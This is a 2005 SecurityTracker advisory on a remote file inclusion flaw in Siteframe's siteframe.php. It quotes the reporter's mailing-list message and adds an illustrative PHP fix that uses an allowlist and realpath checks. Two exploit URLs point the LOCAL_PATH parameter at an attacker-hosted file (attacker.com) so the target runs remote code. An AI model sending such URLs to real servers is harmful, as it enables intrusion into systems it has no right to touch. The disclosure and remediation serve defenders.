Siteframe Include File Flaw in 'siteframe.php' Lets Remote Users Execute Arbitrary Commands

SecurityTracker Alert ID: 1014150
SecurityTracker URL: http://securitytracker.com/id?1014150
CVE Reference: GENERIC-MAP-NOMATCH
Date: Jun 9 2005
Impact: Execution of arbitrary code via network, User access via network
Exploit Included: Yes
Description: PRI[l from MOROCCO reported a vulnerability in Siteframe. A remote user can execute arbitrary commands on the target system.

The 'siteframe.php' script includes files relative to the user-supplied 'LOCAL_PATH' parameter without validating the input. A remote user can supply a specially crafted URL that causes the target system to include and execute arbitrary PHP code fetched from a remote location. The included PHP code, and any operating system commands it invokes, runs with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/siteframe/siteframe.php?LOCAL_PATH=http://[attacker]/PRI[ll
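As an added illustration of the defect class described above (an include root taken from the request without validation), not Siteframe's own code: a hypothetical vulnerable pattern beside a hardened replacement that accepts only pre-registered site names and confines the resolved directory to a fixed root. The names SITE_ROOT, ALLOWED_SITES and resolve_local_path are assumptions made for this example.

```php
<?php
// Added example for the advisory above; NOT Siteframe's code.
// SITE_ROOT, ALLOWED_SITES and resolve_local_path() are assumed names.
declare(strict_types=1);

// Hypothetical vulnerable pattern: the include root comes straight from the
// request, so a value such as "http://host/file" makes require() fetch and
// run remote PHP whenever allow_url_include/allow_url_fopen permit it.
function vulnerable_include_base(): string
{
    return $_GET['LOCAL_PATH'] ?? '.';
}

// Hardened replacement: the root is fixed at deploy time and the request may
// only choose among registered site directories below it.
const SITE_ROOT = __DIR__ . '/sites';
const ALLOWED_SITES = ['default', 'blog', 'photos'];

function resolve_local_path(string $requested): string
{
    // Allowlist first: a URL, "..", or any other unexpected value is rejected
    // before it reaches the filesystem.
    if (!in_array($requested, ALLOWED_SITES, true)) {
        throw new RuntimeException('unknown site: ' . $requested);
    }
    $root = realpath(SITE_ROOT);
    $resolved = realpath(SITE_ROOT . '/' . $requested);
    // realpath() returns false for missing paths and collapses ".." and
    // symlinks; the prefix test then catches a link that escapes the root.
    if ($root === false || $resolved === false
        || strpos($resolved, $root . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('site directory is outside the root');
    }
    return $resolved;
}

// Defence in depth: keep allow_url_include=Off in php.ini so that even a
// missed check cannot turn an include into a remote fetch.
$localPath = resolve_local_path($_GET['LOCAL_PATH'] ?? 'default');
require $localPath . '/config.php';
```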

Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

Solution: No solution was available at the time of this entry.

Vendor URL: www.siteframe.org/

Cause: Input validation error, State error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: "the_r00t theroot" <the_r00t3r@hotmail.com>

Message History: None.

Source Message Contents

Date: Thu, 09 Jun 2005 01:21:19 +0000
From: "the_r00t theroot" <the_r00t3r@hotmail.com>
Subject: siteframe file bug in siteframe.php lets Remote Users Execute Arbitrary Command

Title : siteframe file bug in siteframe.php lets Remote Users Execute Arbitrary Command
Date : 09/06/2005
Impact: Remote code execution
Risk Level: High
http://victim.com/siteframe/siteframe.php?LOCAL_PATH=http://attacker.com/PRI[ll
..::Credits for this vulnerability goes to PRI[l from MOROCCO::..
greetz : Arabian FighterZ - #whackerz - Mianwalian - mani1 - ch33ta - and all friends :D
..::PROUD TO BE Moroccan::..